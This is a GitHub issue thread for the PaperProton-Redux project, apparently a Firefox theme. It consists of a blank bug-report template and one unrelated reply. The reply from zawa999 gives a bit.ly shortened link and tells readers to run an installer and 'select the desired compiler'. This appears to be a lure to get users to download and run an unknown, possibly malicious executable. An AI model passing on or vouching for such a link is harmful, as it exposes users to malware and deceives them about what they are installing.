### ISSUE TITLE
Issue Template

### ISSUE THREAD

**Issue by zach-j-murphy** [zach-j-murphy/PaperProton-Redux#1]
### Description
Include clear explanation of bug and how to reproduce.

**Include Screenshot / Video Recording If Possible.**

### Configuration
* Firefox Version: 
* OS: (eg. Windows 11, MacOS 14, Linux with GNOME 45, etc.)
* Tweaks Enabled: 
  * `uc.tweak.example`

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer
